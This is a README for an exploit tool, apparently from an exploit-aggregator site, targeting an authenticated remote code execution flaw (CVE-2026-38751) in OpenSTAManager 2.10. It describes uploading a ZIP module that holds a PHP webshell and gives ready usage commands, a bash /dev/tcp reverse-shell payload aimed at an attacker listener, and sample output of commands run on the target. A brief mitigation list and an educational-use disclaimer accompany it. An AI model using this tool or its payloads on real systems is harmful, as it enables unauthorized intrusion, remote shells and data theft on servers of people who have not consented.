Share
## https://sploitus.com/exploit?id=0AD81F0A-804F-5737-B912-95EFBDA45CE6
# OpenSTAManager RCE Exploit (CVE-2026-38751)
## Overview
This Python script exploits a Remote Code Execution vulnerability in OpenSTAManager version 2.10, identified as CVE-2026-38751. The exploit allows authenticated users to upload a malicious module and execute arbitrary commands on the target system.
## Vulnerability Details
- **CVE ID**: CVE-2026-38751
- **Product**: OpenSTAManager
- **Version**: 2.10
- **Type**: Remote Code Execution (RCE)
- **Attack Vector**: Web-based, requires valid authentication
## How the Exploit Works
The exploit follows these steps:
1. **Authentication**: Logs into the OpenSTAManager application using provided credentials
2. **Enable Updates**: Activates module update functionality which is required for the exploit
3. **Create Malicious ZIP**: Generates a ZIP file containing:
- A module definition file (`MODULE`)
- A PHP shell script (`shell.php`) that executes commands via GET parameter `c`
4. **Upload Module**: Uploads the malicious ZIP through the module update interface
5. **Verify Exploitation**: Confirms the shell is accessible and functional
6. **Execute Commands**: Either:
- Interactive shell mode for manual command execution
- Reverse shell connection to establish a persistent connection
## Prerequisites
- Python 3.x
- Required Python packages: `requests`, `zipfile`
- Valid admin credentials for OpenSTAManager
- Network access to the target system
## Usage
### Basic Usage
```bash
python3 exploit.py -u http://target.com -U admin -P password
```
### Interactive Shell Mode
```bash
python3 exploit.py -u http://target.com -U admin -P password --interactive
```
### Reverse Shell Mode
```bash
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
```
## Arguments
| Argument | Description |
|----------|-------------|
| `-u`, `--url` | Target URL (required) |
| `-U`, `--user` | Username for authentication (required) |
| `-P`, `--password` | Password for authentication (required) |
| `--interactive` | Enter interactive shell mode |
| `--no-cleanup` | Don't remove shell files after execution |
| `--lhost` | Local host for reverse shell |
| `--lport` | Local port for reverse shell |
## Technical Details
### Exploitation Process
1. **Authentication**: The script performs a login request to the application's authentication endpoint
2. **Module Update Enablement**: Sends a POST request to enable module updates functionality
3. **ZIP Generation**: Creates a ZIP archive with:
- `shell/MODULE`: Module configuration file
- `shell/shell.php`: PHP webshell that executes commands passed via GET parameter `c`
4. **Upload Process**: Uses multipart form data to upload the malicious ZIP to the module update endpoint
5. **Verification**: Tests the uploaded shell by executing a simple command like `id` to confirm it's working
6. **Command Execution**: Either provides an interactive shell or establishes a reverse shell connection
### Payloads Used
The exploit attempts multiple reverse shell payloads:
- Bash reverse shell: `bash -i >& /dev/tcp/{lhost}/{lport} 0>&1`
- Python reverse shells using socket connections
- Base64 encoded bash payload
- Netcat reverse shell
## Security Considerations
โ ๏ธ **Disclaimer**: This exploit is intended for educational and authorized security testing purposes only.
### Risk Assessment
This vulnerability allows:
- Arbitrary code execution as the web server user
- Potential privilege escalation
- Access to sensitive data stored on the system
- Possible lateral movement within a network
### Mitigation
To protect against this vulnerability:
1. Update OpenSTAManager to the latest version
2. Implement proper authentication controls
3. Restrict file upload capabilities
4. Monitor for suspicious activity
5. Apply network segmentation
## Example Output
```
[ OpenSTAManager RCE Exploit : ]
Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit
```
## References
- [GitHub Repository](https://github.com/b0ySie7e/OpenSTAManager-RCE-Exploit-CVE-2026-38751)
- [CVE Details](https://nvd.nist.gov/vuln/detail/CVE-2026-38751)
## License
This exploit is provided for educational purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.